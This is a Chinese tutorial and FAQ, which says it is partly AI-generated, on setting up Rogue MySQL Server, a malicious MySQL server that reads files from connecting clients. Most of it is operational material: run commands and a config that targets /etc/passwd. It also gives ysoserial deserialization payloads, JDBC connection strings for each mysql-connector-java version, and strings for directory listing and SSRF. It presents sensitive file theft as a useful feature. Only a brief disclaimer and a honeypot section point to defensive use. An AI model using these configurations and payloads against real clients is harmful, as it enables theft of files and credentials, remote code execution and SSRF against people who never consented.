Rogue Mysql Server常见问题解答:新手必知的10个实用技巧

Rogue Mysql Server常见问题解答:新手必知的10个实用技巧
Rogue Mysql Server常见问题解答新手必知的10个实用技巧【免费下载链接】rogue_mysql_serverA rouge mysql server supports reading files from most mysql libraries of multiple programming languages.项目地址: https://gitcode.com/gh_mirrors/ro/rogue_mysql_serverRogue Mysql Server 是一个基于 MySQL 协议实现的恶意服务器工具支持从多种编程语言的 MySQL 客户端库中读取文件。对于安全研究人员和渗透测试人员来说这个工具在安全评估和漏洞利用测试中非常实用。本文将为您解答 Rogue Mysql Server 的常见问题并提供10个必知的实用技巧。 Rogue Mysql Server 是什么Rogue Mysql Server 是一个基于 vitessio/vitess 实现的恶意 MySQL 服务器它能够兼容多种编程语言的 MySQL 客户端库包括 Go、PHP、Python、Java 等。该工具的主要功能是通过 MySQL 协议的 LOAD DATA LOCAL 特性从连接的客户端读取指定文件。 快速开始如何安装和运行1. 克隆仓库并编译首先从 GitCode 克隆项目仓库git clone https://gitcode.com/gh_mirrors/ro/rogue_mysql_server cd rogue_mysql_server2. 生成配置文件运行以下命令生成默认配置文件./rogue_mysql_server -generate这将在当前目录下生成config.yaml配置文件。3. 启动服务器使用默认配置文件启动服务器./rogue_mysql_server或者指定自定义配置文件./rogue_mysql_server -config other_config.yaml 常见问题解答1. Rogue Mysql Server 支持哪些客户端库Rogue Mysql Server 经过测试支持以下客户端库语言客户端库支持状态Gogithub.com/go-sql-driver/mysql✅PHPmysqli, pdo✅Pythonpymysql✅Javamysql-connector-java✅原生客户端10.4.13-MariaDB✅2. 配置文件中的关键参数如何设置配置文件config.yaml是 Rogue Mysql Server 的核心以下是最重要的几个参数host: 0.0.0.0 port: 3306 file_list: [/etc/passwd, C:/boot.ini] save_path: ./loot always_read: true from_database_name: false auth: falsehost/port监听地址和端口file_list要读取的文件列表save_path文件保存路径always_read是否总是尝试读取文件auth是否启用身份验证3. 如何从数据库名称中读取文件当from_database_name设置为true时Rogue Mysql Server 会从客户端连接的数据库名称中提取要读取的文件路径。例如连接字符串为jdbc:mysql://localhost:3306/%2fetc%2fhosts?allowLoadLocalInfiletrue服务器将尝试读取/etc/hosts文件而不是使用file_list中的配置。4. 如何设置身份验证在配置文件中设置auth: true并配置用户列表auth: true users: - root: root - root: password这样只有使用正确用户名和密码的客户端才能连接。5. 如何限制读取文件的大小通过max_file_size参数可以限制读取文件的最大大小单位字节max_file_size: 1048576 # 限制为 1MB设置为0或负数表示无限制。6. 如何利用 Java 客户端反序列化漏洞对于 mysql-connector-javaRogue Mysql Server 支持反序列化漏洞利用。相关配置如下jdbc_exploit: true always_exploit: false ysoserial_command: cc4: [java, -jar, ysoserial-0.0.6-SNAPSHOT-all.jar, CommonsCollections4, touch /tmp/cc4] cc7: [java, -jar, ysoserial-0.0.6-SNAPSHOT-all.jar, CommonsCollections7, touch /tmp/cc7]7. 不同 Java 版本的连接字符串如何配置根据 mysql-connector-java 版本需要使用不同的连接字符串版本JDBC 连接字符串8.xjdbc:mysql://127.0.0.1:3306/test?connectionAttributest:{payload_name}autoDeserializetruequeryInterceptorscom.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptoruserrootpasswordpassword6.xjdbc:mysql://127.0.0.1:3306/test?connectionAttributest:{payload_name}autoDeserializetruestatementInterceptorscom.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptoruserrootpasswordpassword≥5.1.11jdbc:mysql://127.0.0.1:3306/test?connectionAttributest:{payload_name}autoDeserializetruestatementInterceptorscom.mysql.jdbc.interceptors.ServerStatusDiffInterceptoruserrootpasswordpassword8. 如何使用 URL 协议进行目录列表和 SSRFmysql-connector-java 支持使用 URL 协议如file://、http://作为文件名列目录jdbc:mysql://127.0.0.1:3306/file%3A%2F%2F%2F?allowLoadLocalInfiletrueallowUrlInLocalInfiletrueSSRFjdbc:mysql://127.0.0.1:3306/http%3A%2F%2F127.0.0.1:25565?allowLoadLocalInfiletrueallowUrlInLocalInfiletrue9. 文件读取的工作原理是什么Rogue Mysql Server 利用 MySQL 协议的LOAD DATA LOCAL特性。当客户端连接并执行查询时服务器会发送一个文件传输请求客户端会响应并发送指定文件的内容。服务器按照file_list中的顺序每次查询读取一个文件。10. 如何作为蜜罐使用将 Rogue Mysql Server 作为蜜罐使用时建议设置auth: true启用身份验证配置合理的用户凭据监控save_path目录中的文件记录客户端连接信息设置合理的file_list来收集攻击者信息 实用技巧技巧1快速测试配置使用测试目录中的示例代码快速验证配置cd test/python python test.py技巧2自定义版本字符串在配置文件中修改version_string来伪装成不同的 MySQL 版本version_string: 8.0.30技巧3批量文件读取虽然不能一次性读取所有文件但可以通过多次查询按顺序读取file_list中的所有文件。技巧4二进制文件支持Rogue Mysql Server 支持读取二进制文件这对于获取系统敏感信息非常有用。技巧5自动保存机制所有读取的文件都会自动保存到save_path指定的目录中方便后续分析。技巧6连接属性收集服务器可以读取客户端的 ConnAttr这可能包含客户端的额外信息对于指纹识别很有帮助。技巧7兼容性优化基于 vitess 实现Rogue Mysql Server 具有良好的兼容性避免了恼人的兼容性问题。技巧8灵活的监听配置可以绑定到任意 IP 和端口方便在内网环境或特定网络配置下使用。技巧9日志和调试查看服务器运行日志来了解客户端连接和文件读取情况。技巧10安全注意事项仅在授权测试环境中使用遵守当地法律法规不要用于非法目的测试完成后及时关闭服务器 项目结构概览了解项目结构有助于更好地使用 Rogue Mysql Servermain.go主程序入口config.yaml配置文件模板mysql/MySQL 协议实现相关代码test/各语言测试代码loot/读取文件的保存目录 总结Rogue Mysql Server 是一个功能强大的 MySQL 协议安全测试工具通过本文的10个实用技巧和常见问题解答您应该能够更好地理解和使用这个工具。无论是进行安全评估、漏洞研究还是作为蜜罐使用Rogue Mysql Server 都能提供强大的支持。记住安全工具的使用必须遵守法律法规和道德准则仅在授权范围内进行测试。希望这篇文章能帮助您更安全、更有效地使用 Rogue Mysql Server【免费下载链接】rogue_mysql_serverA rouge mysql server supports reading files from most mysql libraries of multiple programming languages.项目地址: https://gitcode.com/gh_mirrors/ro/rogue_mysql_server创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考